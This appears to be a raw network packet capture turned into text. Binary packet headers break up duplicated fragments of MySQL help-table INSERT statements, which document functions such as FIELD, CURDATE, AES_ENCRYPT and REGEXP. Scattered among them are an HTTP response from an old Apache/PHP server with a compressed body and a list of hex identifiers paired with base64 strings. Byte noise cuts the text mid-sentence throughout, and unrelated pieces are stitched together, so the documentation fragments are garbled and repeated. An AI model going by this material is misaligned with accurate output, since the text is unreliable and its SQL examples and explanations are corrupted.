[select_statement]',''),(372,'>',26,' >\nGreater than:\n','mysql> SELECT 2 > 2;\n -> 0',''),(373,'MICROSECOND',14,' MICROSECOND(expr)\n\nReturns the microseconds from the time or datetime expression expr as a\nnumber in the range from 0 to 999999.\n','mysql> SELECT MICROSECOND(\'12:00:00.123456\');\n -> 123456\nmysql> SELECT MICROSECOND(\'1997-12-31 23:59:59.000010\');\n -> 10',''),(374,'ANALYZE',7,'This statement analyzes and stores the key distribution for a table.\nDuring the analysis, the table is locked with a read lock. This works on\nMyISAM and BDB tables and (as of MySQL 4.0.13) InnoDB\ntables. For MyISAM tables, this\nstatement is equivalent to using myisamchk -a.\n\nMySQL uses the stored key distribution to decide the order in which\ntables should be joined when you perform a join on something otheC\SZZ0`BiEL@/o0  E41@@Y  ePZ>!{ f`~C!WbbBi0`ET@/p܂Ao0E<*@?  3PK*b   )r than a\nconstant.\n','ANALYZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...',''),(375,'CONSTRAINT',7,'The syntax of a foreign key constraint definition in InnoDB looks like\nthis:\n\n[CONSTRAINT symbol] FOREIGN KEY [id] (index_col_name, ...)\n REFERENCES tbl_name (index_col_name, ...)\n [ON DELETE {RESTRICT | CASCADE | SET NULL | NO ACTION}]\n [ON UPDATE {RESTRICT | CASCADE | SET NULL | NO ACTION}]\n','CREATE TABLE product (category INT NOT NULL, id INT NOT NULL,\n price DECIMAL,\n PRIMARY KEY(category, id)) TYPE=INNODB;\nCREATE TABLE customer (id INT NOT NULL,\n PRIMARY KEY (id)) TYPE=INNODB;\nCREATE TABLE product_order (no INT NOT NULL AUTO_INCREMENT,\n product_category INT NOT NULL,\n product_id INT NOT NULL,\n customer_id INT NOT NULL,\n PRIMARY KEY(no),\n INDEX (product_category, product_id),\n FOREIGN KEY (product_category, product_id)\n REFERENCES product(category, id)\n ON UPDATE CASCADE ON DELETE RESTRICT,\n INDEX (customer_id),\n FOREIGN KEY (customer_id)\n C4Wbb0`BiET@/Ԁo0SE<*@@  3PK*b   )r than a\nconstant.\n','ANALYZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...',''),(375,'CONSTRAINT',7,'The syntax of a foreign key constraint definition in InnoDB looks like\nthis:\n\n[CONSTRAINT symbol] FOREIGN KEY [id] (index_col_name, ...)\n REFERENCES tbl_name (index_col_name, ...)\n [ON DELETE {RESTRICT | CASCADE | SET NULL | NO ACTION}]\n [ON UPDATE {RESTRICT | CASCADE | SET NULL | NO ACTION}]\n','CREATE TABLE product (category INT NOT NULL, id INT NOT NULL,\n price DECIMAL,\n PRIMARY KEY(category, id)) TYPE=INNODB;\nCREATE TABLE customer (id INT NOT NULL,\n PRIMARY KEY (id)) TYPE=INNODB;\nCREATE TABLE product_order (no INT NOT NULL AUTO_INCREMENT,\n product_category INT NOT NULL,\n product_id INT NOT NULL,\n customer_id INT NOT NULL,\n PRIMARY KEY(no),\n INDEX (product_category, product_id),\n FOREIGN KEY (product_category, product_id)\n REFERENCES product(category, id)\n ON UPDATE CASCADE ON DELETE RESTRICT,\n INDEX (customer_id),\n FOREIGN KEY (customer_id)\n C\bbBi0`ET@/p܂Ao0E<*@?  3PP2b y  ) REFERENCES customer(id)) TYPE=INNODB;',''),(376,'FIELD',23,' FIELD(str,str1,str2,str3,...)\nReturns the index of str in the str1, str2,\nstr3, ... list.\nReturns 0 if str is not found.\n\nIf all arguments to FIELD() are strings, all arguments are compared\nas strings. If all arguments are numbers, they are compared as\nnumbers. Otherwise, the arguments are compared as double.\n\nIf str is NULL, the return value is 0 because\nNULL fails equality comparison with any value.\nFIELD() is the complement of ELT().\n','mysql> SELECT FIELD(\'ej\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 2\nmysql> SELECT FIELD(\'fo\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 0',''),(377,'MAKETIME',14,' MAKETIME(hour,minute,second)\n\nReturns a time value calculated from the hour, minute, and\nsecond arguments.\n','mysql> SELECT MAKETIME(12,15,30);\n -> \'12:15:30\'',''),(378,'CURDATE',14,' CURDATE()\n\nReturns the current date as a value in \'YYYY-MM-DD\' or YYYYMMDD\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURDATE();\n -> \'1997-12-15\'\nmysql> SELECT CURDATE() + 0;\n -> 19971215',''),(379,'MIN MAX',12,' MIN([DISTINCT] expr)\n MAX([DISTINCT] expr)\C\ZZBi0`EL@/Ao0E4@?  ֞Pg%Y"l=c fmvC\ZZBi0`EL@/܂Sŀo0E4@? 3 P) ) 4C\bb0`BiET@/Ԁo0SE<*@@  3PP2b y  ) REFERENCES customer(id)) TYPE=INNODB;',''),(376,'FIELD',23,' FIELD(str,str1,str2,str3,...)\nReturns the index of str in the str1, str2,\nstr3, ... list.\nReturns 0 if str is not found.\n\nIf all arguments to FIELD() are strings, all arguments are compared\nas strings. If all arguments are numbers, they are compared as\nnumbers. Otherwise, the arguments are compared as double.\n\nIf str is NULL, the return value is 0 because\nNULL fails equality comparison with any value.\nFIELD() is the complement of ELT().\n','mysql> SELECT FIELD(\'ej\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 2\nmysql> SELECT FIELD(\'fo\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 0',''),(377,'MAKETIME',14,' MAKETIME(hour,minute,second)\n\nReturns a time value calculated from the hour, minute, and\nsecond arguments.\n','mysql> SELECT MAKETIME(12,15,30);\n -> \'12:15:30\'',''),(378,'CURDATE',14,' CURDATE()\n\nReturns the current date as a value in \'YYYY-MM-DD\' or YYYYMMDD\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURDATE();\n -> \'1997-12-15\'\nmysql> SELECT CURDATE() + 0;\n -> 19971215',''),(379,'MIN MAX',12,' MIN([DISTINCT] expr)\n MAX([DISTINCT] expr)\C\ZZ0`BiEL@/o0˃2E4@@  ֞Pg%Y"l=c fmvC\ZZ0`BiEL@/go0AE4@@ 3 P) ) 4C`bbBi0`ET@/p܂Ao0E<*@?  3PU:b   )nReturns the minimum or maximum value of expr. MIN() and\nMAX() may take a string argument; in such cases they return the\nminimum or maximum string value. See also : [MySQL indexes].\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to find the minimum\nor maximum of the distinct values of expr; this is supported, but\nproduces the same result as omitting DISTINCT.\n','mysql> SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(380,'SET PASSWORD',7,'','SET PASSWORD = PASSWORD(\'some password\')\nSET PASSWORD FOR user = PASSWORD(\'some password\')',''),(381,'ENUM',1,' ENUM(\'value1\',\'value2\',...)\n\nAn enumeration. A string object that can have only one value, chosen\nfrom the list of values \'value1\', \'value2\', ...,\nNULL or the special \'\' error value. An ENUM column can\nhave a maximum of 65,535 distinct values.\nENUM values are represented internally as integers.\n','',''),(382,'DATABASE',25,' DATABASE()\nReturns the default (current) database name.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT DATABASE();\n -> \'test\'',''),(383,'POINTFROMWKB',13,' PointFromWKB(wkb[,srid])\nConstructs a POINT value using its WKB representation and SRID.\nC`bb0`BiET@/Ԁo0SE<*@@  3PU:b   )nReturns the minimum or maximum value of expr. MIN() and\nMAX() may take a string argument; in such cases they return the\nminimum or maximum string value. See also : [MySQL indexes].\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to find the minimum\nor maximum of the distinct values of expr; this is supported, but\nproduces the same result as omitting DISTINCT.\n','mysql> SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(380,'SET PASSWORD',7,'','SET PASSWORD = PASSWORD(\'some password\')\nSET PASSWORD FOR user = PASSWORD(\'some password\')',''),(381,'ENUM',1,' ENUM(\'value1\',\'value2\',...)\n\nAn enumeration. A string object that can have only one value, chosen\nfrom the list of values \'value1\', \'value2\', ...,\nNULL or the special \'\' error value. An ENUM column can\nhave a maximum of 65,535 distinct values.\nENUM values are represented internally as integers.\n','',''),(382,'DATABASE',25,' DATABASE()\nReturns the default (current) database name.\nAs of MySQL 4.1, the string has the utf8 character set.\n','mysql> SELECT DATABASE();\n -> \'test\'',''),(383,'POINTFROMWKB',13,' PointFromWKB(wkb[,srid])\nConstructs a POINT value using its WKB representation and SRID.\nCYb  Bi0`E@/!<o0E @?l  Pճ㝯8X ky 1U7=xHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:37 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 384 Connection: close Content-Type: text/xml Rn0}+:B͒esʈ[ 4۞*qWdh>,{r951,"IU;-7%BQȺ`<$˲NEl_v;Wza78_uAT%v1+ !'`ƨY ` bY|òGk6gSHa̎AD8d(+%[tV$UY@jHuWhjbXC-RXNhpveh9Cǎ ,s= xxMp2H#8Lj`X> $PD% tHs9IQG.!!TqL2:s2uVڃQ6щ!O7u56/iT. "fUĝ/Cpb  ʪBiE@/fo0o0oE @@l  Pճ㝯8X l 1U7=xHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:37 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 384 Connection: close Content-Type: text/xml Rn0}+:B͒esʈ[ 4۞*qWdh>,{r951,"IU;-7%BQȺ`<$˲NEl_v;Wza78_uAT%v1+ !'`ƨY ` bY|òGk6gSHa̎AD8d(+%[tV$UY@jHuWhjbXC-RXNhpveh9Cǎ ,s= xxMp2H#8Lj`X> $PD% tHs9IQG.!!TqL2:s2uVڃQ6щ!O7u56/iT. "fUĝ/CHebbBi0`ET@/p܂Ao0E<*@?  3PZBb 9_  )','',''),(384,'POWER',4,' POW(X,Y)\n POWER(X,Y)\nReturns the value of X raised to the power of Y.\n','mysql> SELECT POW(2,2);\n -> 4.000000\nmysql> SELECT POW(2,-2);\n -> 0.250000',''),(385,'ATAN',4,' ATAN(X)\nReturns the arc tangent of X, that is, the value whose tangent is\nX.\n','mysql> SELECT ATAN(2);\n -> 1.107149\nmysql> SELECT ATAN(-2);\n -> -1.107149',''),(386,'STRCMP',23,' STRCMP(expr1,expr2)\nSTRCMP()\nreturns 0 if the strings are the same, -1 if the first\nargument is smaller than the second according to the current sort order,\nand 1 otherwise.\n','mysql> SELECT STRCMP(\'text\', \'text2\');\n -> -1\nmysql> SELECT STRCMP(\'text2\', \'text\');\n -> 1\nmysql> SELECT STRCMP(\'text\', \'text\');\n -> 0',''),(387,'INSERT DELAYED',6,'The DELAYED option for the INSERT statement is a\nMySQL extension to standard SQL that is very useful if you have clients\nthat can\'t wait for the INSERT to complete. This is a common\nproblem when you use MySQL for logging and you also\nperiodically run SELECT and UPDATE statements that take a\nlong time to complete. DELAYED was introduced in MySQL\n3.22.15.\n\nWhen a client uses INSERT DELAYED, it gets an okay from the server at\nonce, and the row is queued to be inserted COeZZBi0`EL@/Ao0E4@?  ֞Pg%c."l3N fmxCSeZZBiʪEL@/o0oo0E4@@n ճP8XN 7=y1UCdebb0`BiET@/Ԁo0SE<*@@  3PZBb 9_  )','',''),(384,'POWER',4,' POW(X,Y)\n POWER(X,Y)\nReturns the value of X raised to the power of Y.\n','mysql> SELECT POW(2,2);\n -> 4.000000\nmysql> SELECT POW(2,-2);\n -> 0.250000',''),(385,'ATAN',4,' ATAN(X)\nReturns the arc tangent of X, that is, the value whose tangent is\nX.\n','mysql> SELECT ATAN(2);\n -> 1.107149\nmysql> SELECT ATAN(-2);\n -> -1.107149',''),(386,'STRCMP',23,' STRCMP(expr1,expr2)\nSTRCMP()\nreturns 0 if the strings are the same, -1 if the first\nargument is smaller than the second according to the current sort order,\nand 1 otherwise.\n','mysql> SELECT STRCMP(\'text\', \'text2\');\n -> -1\nmysql> SELECT STRCMP(\'text2\', \'text\');\n -> 1\nmysql> SELECT STRCMP(\'text\', \'text\');\n -> 0',''),(387,'INSERT DELAYED',6,'The DELAYED option for the INSERT statement is a\nMySQL extension to standard SQL that is very useful if you have clients\nthat can\'t wait for the INSERT to complete. This is a common\nproblem when you use MySQL for logging and you also\nperiodically run SELECT and UPDATE statements that take a\nlong time to complete. DELAYED was introduced in MySQL\n3.22.15.\n\nWhen a client uses INSERT DELAYED, it gets an okay from the server at\nonce, and the row is queued to be inserted CoeZZ0`BiEL@/o0˃2E4@@  ֞Pg%c."l3N fmxCzeZZ0`BiEL@/To0<E4@@m  ճP8XNo 7=y1UCeZZBi0`EL@/܂Sŀo0E4S~@? 3 PtX:> ) >CeZZBi0`EL@/܂Sŀo0E4@? 3 Pf't )CeZZ0`BiEL@/go0AE4S~@@ 3 PtX:> ) >CeZZ0`BiEL@/go0AE4@@ 3 Pf't )C*jbbBi0`ET@/p܂Ao0E<*@?  3P_Jb   )when the table is not in use by\nany other thread.\n\nAnother major benefit of using INSERT DELAYED is that inserts\nfrom many clients are bundled together and written in one block. This is much\nfaster than doing many separate inserts.\n\nThere are some constraints on the use of DELAYED:\n\n\n --- INSERT DELAYED works only with ISAM, MyISAM, and (beginning\nwith MySQL 4.1) MEMORY tables.\nFor MyISAM tables, if there are no free blocks in the middle of the\ndata file, concurrent SELECT and INSERT statements are supported.\nUnder these circumstances, you very seldom need to use INSERT\nDELAYED with MyISAM.\nSee also : [MyISAM storage engine, , MyISAM storage engine].\nSee also : [MEMORY storage engine, , MEMORY storage engine].\n\n --- INSERT DELAYED should be used only for INSERT statements that\nspecify value lists. This is enforced as of MySQL 4.0.18. The server ignores\nDELAYED for INSERT DELAYED ... SELECT statements.\n\n --- The server ignores\nDELAYED for INSERT DELAYED ... ON DUPLICATE UPDATE statements.\n\n --- Because the statement returns immediately before the rows are inserted,\nyou cannot use LAST_INSERT_ID() to get the AUTO_INCREMENT\nvalue the statement might generate.\n\n --- DELAYED rows are not visible to SELECT statements until they\nactually have C1jZZBi0`EL@/܂Sŀo0E4S@? 3 PtX?@  ) >C5jZZBi0`EL@/$T<o0E4 @?o  PճN8X / 1U7=xCEjbb0`BiET@/Ԁo0SE<*@@  3P_Jb   )when the table is not in use by\nany other thread.\n\nAnother major benefit of using INSERT DELAYED is that inserts\nfrom many clients are bundled together and written in one block. This is much\nfaster than doing many separate inserts.\n\nThere are some constraints on the use of DELAYED:\n\n\n --- INSERT DELAYED works only with ISAM, MyISAM, and (beginning\nwith MySQL 4.1) MEMORY tables.\nFor MyISAM tables, if there are no free blocks in the middle of the\ndata file, concurrent SELECT and INSERT statements are supported.\nUnder these circumstances, you very seldom need to use INSERT\nDELAYED with MyISAM.\nSee also : [MyISAM storage engine, , MyISAM storage engine].\nSee also : [MEMORY storage engine, , MEMORY storage engine].\n\n --- INSERT DELAYED should be used only for INSERT statements that\nspecify value lists. This is enforced as of MySQL 4.0.18. The server ignores\nDELAYED for INSERT DELAYED ... SELECT statements.\n\n --- The server ignores\nDELAYED for INSERT DELAYED ... ON DUPLICATE UPDATE statements.\n\n --- Because the statement returns immediately before the rows are inserted,\nyou cannot use LAST_INSERT_ID() to get the AUTO_INCREMENT\nvalue the statement might generate.\n\n --- DELAYED rows are not visible to SELECT statements until they\nactually have CPjZZ0`BiEL@/go0AE4S@@ 3 PtX?@  ) >C\jZZʪBiEL@/o0o0oE4 @@o  PճN8X N 1U7=xClZZBiʪEL@/o0oo0E4@@n ճP8XO 7=y1UClZZ0`BiEL@/To0<E4@@m  ճP8XOc 7=y1UCnbbBi0`ET@/p܂Ao0E<*@?  3PdRb   )been inserted.\n\n --- DELAYED are ignored on slaves, because this could cause the slave to\nhave different data than the master.\n','INSERT DELAYED ...',''),(388,'MEDIUMTEXT',1,' MEDIUMTEXT\n\nA TEXT column with a maximum length of 16,777,215\n(2^24 - 1) characters.\n','',''),(389,'LN',4,' LN(X)\nReturns the natural logarithm of X.\n','mysql> SELECT LN(2);\n -> 0.693147\nmysql> SELECT LN(-2);\n -> NULL',''),(390,'LOG',4,' LOG(X)\n LOG(B,X)\nIf called with one parameter, this function returns the natural logarithm\nof X.\n','mysql> SELECT LOG(2);\n -> 0.693147\nmysql> SELECT LOG(-2);\n -> NULL',''),(391,'SET SQL_LOG_BIN',6,'SET SQL_LOG_BIN = {0|1}\n\nDisables or enables binary logging for the current connection\n(SQL_LOG_BIN is a session variable)\nif the client connects using an account that has the SUPER privilege.\nThe statement is refused with an error if the client does not have that\nprivilege. (Before MySQL 4.1.2, the statement was simply ignored in that case.)\n','',''),(392,'!=',26,' <>\n !=\nNot equal:\n','mysql> SELECT \'.01\' <> \'0.01\';\n -> 1\nmysql> SELECT .01 <> \'0.01\';\n -> 0\nmysql> SELECT \'zapp\' <> \'zappp\';\n -> 1',''),(393,'AES_DECRYPT',17,' AES_ENCRYPT(str,key_str)\n AES_DECRYCnZZBi0`EL@/Ao0E4@?  ֞Pg%m>"l): fmzC'nbb0`BiET@/Ԁo0SE<*@@  3PdRb   )been inserted.\n\n --- DELAYED are ignored on slaves, because this could cause the slave to\nhave different data than the master.\n','INSERT DELAYED ...',''),(388,'MEDIUMTEXT',1,' MEDIUMTEXT\n\nA TEXT column with a maximum length of 16,777,215\n(2^24 - 1) characters.\n','',''),(389,'LN',4,' LN(X)\nReturns the natural logarithm of X.\n','mysql> SELECT LN(2);\n -> 0.693147\nmysql> SELECT LN(-2);\n -> NULL',''),(390,'LOG',4,' LOG(X)\n LOG(B,X)\nIf called with one parameter, this function returns the natural logarithm\nof X.\n','mysql> SELECT LOG(2);\n -> 0.693147\nmysql> SELECT LOG(-2);\n -> NULL',''),(391,'SET SQL_LOG_BIN',6,'SET SQL_LOG_BIN = {0|1}\n\nDisables or enables binary logging for the current connection\n(SQL_LOG_BIN is a session variable)\nif the client connects using an account that has the SUPER privilege.\nThe statement is refused with an error if the client does not have that\nprivilege. (Before MySQL 4.1.2, the statement was simply ignored in that case.)\n','',''),(392,'!=',26,' <>\n !=\nNot equal:\n','mysql> SELECT \'.01\' <> \'0.01\';\n -> 1\nmysql> SELECT .01 <> \'0.01\';\n -> 0\nmysql> SELECT \'zapp\' <> \'zappp\';\n -> 1',''),(393,'AES_DECRYPT',17,' AES_ENCRYPT(str,key_str)\n AES_DECRYC2nZZ0`BiEL@/o0˃2E4@@  ֞Pg%m>"l): fmzCurbbBi0`ET@/p܂Ao0E<*@?  3PiZb   )PT(crypt_str,key_str)\nThese functions allow encryption and decryption of data using the official\nAES (Advanced Encryption Standard) algorithm, previously known as \"Rijndael.\"\nEncoding with a 128-bit key length is used, but you can extend it up to\n256 bits by modifying the source. We chose 128 bits because it is much\nfaster and it is usually secure enough.\n\nThe input arguments may be any length. If either argument is NULL,\nthe result of this function is also NULL.\n\nBecause AES is a block-level algorithm, padding is used to encode uneven length\nstrings and so the result string length may be calculated as\n16*(trunc(string_length/16)+1).\n\nIf AES_DECRYPT() detects invalid data or incorrect padding, it\nreturns NULL. However, it is possible for AES_DECRYPT()\nto return a non-NULL value (possibly garbage) if the input data or\nthe key is invalid.\n\nYou can use the AES functions to store data in an encrypted form by\nmodifying your queries:\n','INSERT INTO t VALUES (1,AES_ENCRYPT(\'text\',\'password\'));',''),(394,'DAYNAME',14,' DAYNAME(date)\nReturns the name of the weekday for date.\n','mysql> SELECT DAYNAME(\'1998-02-05\');\n -> \'Thursday\'',''),(395,'COERCIBILITY',25,' COERCIBILITY(str)\nReturns the collation coercibility value of the string aCrbb0`BiET@/Ԁo0SE<*@@  3PiZb   )PT(crypt_str,key_str)\nThese functions allow encryption and decryption of data using the official\nAES (Advanced Encryption Standard) algorithm, previously known as \"Rijndael.\"\nEncoding with a 128-bit key length is used, but you can extend it up to\n256 bits by modifying the source. We chose 128 bits because it is much\nfaster and it is usually secure enough.\n\nThe input arguments may be any length. If either argument is NULL,\nthe result of this function is also NULL.\n\nBecause AES is a block-level algorithm, padding is used to encode uneven length\nstrings and so the result string length may be calculated as\n16*(trunc(string_length/16)+1).\n\nIf AES_DECRYPT() detects invalid data or incorrect padding, it\nreturns NULL. However, it is possible for AES_DECRYPT()\nto return a non-NULL value (possibly garbage) if the input data or\nthe key is invalid.\n\nYou can use the AES functions to store data in an encrypted form by\nmodifying your queries:\n','INSERT INTO t VALUES (1,AES_ENCRYPT(\'text\',\'password\'));',''),(394,'DAYNAME',14,' DAYNAME(date)\nReturns the name of the weekday for date.\n','mysql> SELECT DAYNAME(\'1998-02-05\');\n -> \'Thursday\'',''),(395,'COERCIBILITY',25,' COERCIBILITY(str)\nReturns the collation coercibility value of the string aCduZZBi0`EL@/Ao0E4 @?  ֞Pg%wN"l& fm|CuuZZ0`BiEL@/o0˃2E4 @@  ֞Pg%wN"l& fm|CwbbBi0`ET@/p܂Ao0E<*@?  3Pnbb   )rgument.\n','mysql> SELECT COERCIBILITY(\'abc\' COLLATE latin1_swedish_ci);\n -> 0\nmysql> SELECT COERCIBILITY(USER());\n -> 3\nmysql> SELECT COERCIBILITY(\'abc\');\n -> 4',''),(396,'INT',1,' INT[(M)] [UNSIGNED] [ZEROFILL]\n\nA normal-size integer. The signed range is -2147483648 to\n2147483647. The unsigned range is 0 to 4294967295.\n\n INTEGER[(M)] [UNSIGNED] [ZEROFILL]\n\nThis is a synonym for INT.\n','',''),(397,'RLIKE',23,' expr REGEXP pat\n expr RLIKE pat\n\nPerforms a pattern match of a string expression expr against a pattern\npat. The pattern can be an extended regular expression. The syntax\nfor regular expressions is discussed in [Regexp]. Returns 1\nif expr matches pat, otherwise returns 0. If either\nexpr or pat is NULL, the result is NULL.\nRLIKE is a synonym for REGEXP, provided for mSQL\ncompatibility.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nNote: Because MySQL uses the C escape syntax in strings (for example,\n\'\\n\' to represent newline), you must double any \'\\\' that you\nuse in your REGEXP strings.\n\nAs of MySQL 3.23.4, REGEXP is not case sensitive for normal (not\nbinary) strings.\n','mysql> SELECT \'Monty!\' REGEXP \'m%y%%\';\n CwbbBiʪET@/o0oo0E<{@@ նPp 7=yCwbb0`BiET@/Ԁo0SE<*@@  3Pnbb   )rgument.\n','mysql> SELECT COERCIBILITY(\'abc\' COLLATE latin1_swedish_ci);\n -> 0\nmysql> SELECT COERCIBILITY(USER());\n -> 3\nmysql> SELECT COERCIBILITY(\'abc\');\n -> 4',''),(396,'INT',1,' INT[(M)] [UNSIGNED] [ZEROFILL]\n\nA normal-size integer. The signed range is -2147483648 to\n2147483647. The unsigned range is 0 to 4294967295.\n\n INTEGER[(M)] [UNSIGNED] [ZEROFILL]\n\nThis is a synonym for INT.\n','',''),(397,'RLIKE',23,' expr REGEXP pat\n expr RLIKE pat\n\nPerforms a pattern match of a string expression expr against a pattern\npat. The pattern can be an extended regular expression. The syntax\nfor regular expressions is discussed in [Regexp]. Returns 1\nif expr matches pat, otherwise returns 0. If either\nexpr or pat is NULL, the result is NULL.\nRLIKE is a synonym for REGEXP, provided for mSQL\ncompatibility.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nNote: Because MySQL uses the C escape syntax in strings (for example,\n\'\\n\' to represent newline), you must double any \'\\\' that you\nuse in your REGEXP strings.\n\nAs of MySQL 3.23.4, REGEXP is not case sensitive for normal (not\nbinary) strings.\n','mysql> SELECT \'Monty!\' REGEXP \'m%y%%\';\n Cxbb0`BiET@/Lo0<E<{@@  նPp 7=yC?{bbBi0`ET@/أ  o0E<|'@?  PeZ>̀ q a;e;57,ucsb,MTNzEwEDA98q/Oh2eiRDBrT5sxt/AOb5QxBSlQ==
5D4C6D2F52B2905E752A9D8977E73291,ucsb,MTNzEwEDA+B/C6uM7lkz/SxRff00OmrWAXAlBw==
D9E2D5CDF8B5368EA9B9BE139FFDE62C,ucsb,MTNzEwEDA+HuaLXq4L1JHEhChrPclo0M63Yw7w==
01CFF84072851B18E06E1094047146D3,ucsb,MTNzEwEDA+KXI0Bp2SRa27GyMjL65vo3yer2xg==
666BF6EA7BE2139C26A31957C4DC7898,ucsb,MTNzEwEDA+MWwB0N8p/SAd5ru4SKlTTiPwBV3w==
8C4CDBD7CA803CB388C8E120A4796931,ucsb,MTNzEwEDA+SOjE126zJRr+Lxv1frTAXR4HB5UA==
5A0DE8BCA1922ED34072EBA36B424805,ucsb,MTNzEwEDA+UZhYOFj629fLbeO6fmoCW5dOzZrA==
28DA0FE6E02726624684E7FDE0CDCE14,ucsb,MTNzEwEDA+bRx2RB3DcSkljwWan1ORdPyS9DCg==
E32B4A2CA0681249BD967551F48E472C,ucsb,MTNzEwEDA+fcDG4YwymTu5VAUueLI+um70P4KQ==
EBDB2FA27E95E4CD5AD8D7A8ED1B37F4,ucsb,MTNzEwEDA+iIgqB6ogW0crYesllYbP+ihqqMiw==
E510F4F5A10E299F4754A77BD9CA0210,ucsb,MTNzEwEDA+m84twmkjBnEeXUwDVvYcHtSlNFgQ==
D9B102954C669657B66FF7E420A4E2FC,ucsb,MTNzEwEDA+qxfAjwD2BBps7mJkHgKVL10rdcLA==
BA789FDDB7CAB36286D61DAB9276146F,ucsb,MTNzEwEDA+v70Pbbsb9N5sqyNhHgsO1XTfgRWQ==
116A4F475227A4DDE225F5F9C0704706,ucsb,MTNzEwEDA+xd65Bmmu+mp3kkaVoBv3eMF/lRnQ==
576135A6B32EC658A2E7A7DAC3294280,ucsb,MTNzEwEDA+1SJzuGq/lmIuaS0BM4AaWZrDbQtg==
52AF6F567A824D1878F07828EF8279B9,ucsb,MTNzEwEDA+4F1BjuzdkKsVavjjMp3UipTNbCF{ZZBi0`EL@/$T<o0E4D@?  PΜ%р ^7=y-CW{bb0`BiET@/o0AE<|'@@  PeZ>̀ q a;e;57,ucsb,MTNzEwEDA98q/Oh2eiRDBrT5sxt/AOb5QxBSlQ==
5D4C6D2F52B2905E752A9D8977E73291,ucsb,MTNzEwEDA+B/C6uM7lkz/SxRff00OmrWAXAlBw==
D9E2D5CDF8B5368EA9B9BE139FFDE62C,ucsb,MTNzEwEDA+HuaLXq4L1JHEhChrPclo0M63Yw7w==
01CFF84072851B18E06E1094047146D3,ucsb,MTNzEwEDA+KXI0Bp2SRa27GyMjL65vo3yer2xg==
666BF6EA7BE2139C26A31957C4DC7898,ucsb,MTNzEwEDA+MWwB0N8p/SAd5ru4SKlTTiPwBV3w==
8C4CDBD7CA803CB388C8E120A4796931,ucsb,MTNzEwEDA+SOjE126zJRr+Lxv1frTAXR4HB5UA==
5A0DE8BCA1922ED34072EBA36B424805,ucsb,MTNzEwEDA+UZhYOFj629fLbeO6fmoCW5dOzZrA==
28DA0FE6E02726624684E7FDE0CDCE14,ucsb,MTNzEwEDA+bRx2RB3DcSkljwWan1ORdPyS9DCg==
E32B4A2CA0681249BD967551F48E472C,ucsb,MTNzEwEDA+fcDG4YwymTu5VAUueLI+um70P4KQ==
EBDB2FA27E95E4CD5AD8D7A8ED1B37F4,ucsb,MTNzEwEDA+iIgqB6ogW0crYesllYbP+ihqqMiw==
E510F4F5A10E299F4754A77BD9CA0210,ucsb,MTNzEwEDA+m84twmkjBnEeXUwDVvYcHtSlNFgQ==
D9B102954C669657B66FF7E420A4E2FC,ucsb,MTNzEwEDA+qxfAjwD2BBps7mJkHgKVL10rdcLA==
BA789FDDB7CAB36286D61DAB9276146F,ucsb,MTNzEwEDA+v70Pbbsb9N5sqyNhHgsO1XTfgRWQ==
116A4F475227A4DDE225F5F9C0704706,ucsb,MTNzEwEDA+xd65Bmmu+mp3kkaVoBv3eMF/lRnQ==
576135A6B32EC658A2E7A7DAC3294280,ucsb,MTNzEwEDA+1SJzuGq/lmIuaS0BM4AaWZrDbQtg==
52AF6F567A824D1878F07828EF8279B9,ucsb,MTNzEwEDA+4F1BjuzdkKsVavjjMp3UipTNbCc{ZZʪBiEL@/o0o0oE4D@@  PΜ%р ^7=y-C8|bbBi0`ET@/p܂Ao0E<*@?  3Psjb   ) -> 0\nmysql> SELECT \'Monty!\' REGEXP \'.*\';\n -> 1\nmysql> SELECT \'new*\\n*line\' REGEXP \'new\\\\*.\\\\*line\';\n -> 1\nmysql> SELECT \'a\' REGEXP \'A\', \'a\' REGEXP BINARY \'A\';\n -> 1 0\nmysql> SELECT \'a\' REGEXP \'^[a-d]\';\n -> 1',''),(398,'GLENGTH',18,' GLength(ls)\nReturns as a double-precision number the length of the LineString\nvalue ls in its associated spatial reference.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT GLength(GeomFromText(@ls));\n+----------------------------+\n| GLength(GeomFromText(@ls)) |\n+----------------------------+\n| 2.8284271247462 |\n+----------------------------+',''),(399,'RADIANS',4,' RADIANS(X)\nReturns the argument X, converted from degrees to radians.\n','mysql> SELECT RADIANS(90);\n -> 1.570796',''),(400,'COLLATION',25,' COLLATION(str)\nReturns the collation for the character set of the string argument.\n','mysql> SELECT COLLATION(\'abc\');\n -> \'latin1_swedish_ci\'\nmysql> SELECT COLLATION(_utf8\'abc\');\n -> \'utf8_general_ci\'',''),(401,'COALESCE',26,' COALESCE(value,...)\nReturns the first non-NULL value in the list.\n','mysql> SELECT COALESCE(NULL,1);\n -> 1\nmysql> SELECT COALESCE(NULL,NULL,NULL);\n -> NCK|bb0`BiET@/Ԁo0SE<*@@  3Psjb   ) -> 0\nmysql> SELECT \'Monty!\' REGEXP \'.*\';\n -> 1\nmysql> SELECT \'new*\\n*line\' REGEXP \'new\\\\*.\\\\*line\';\n -> 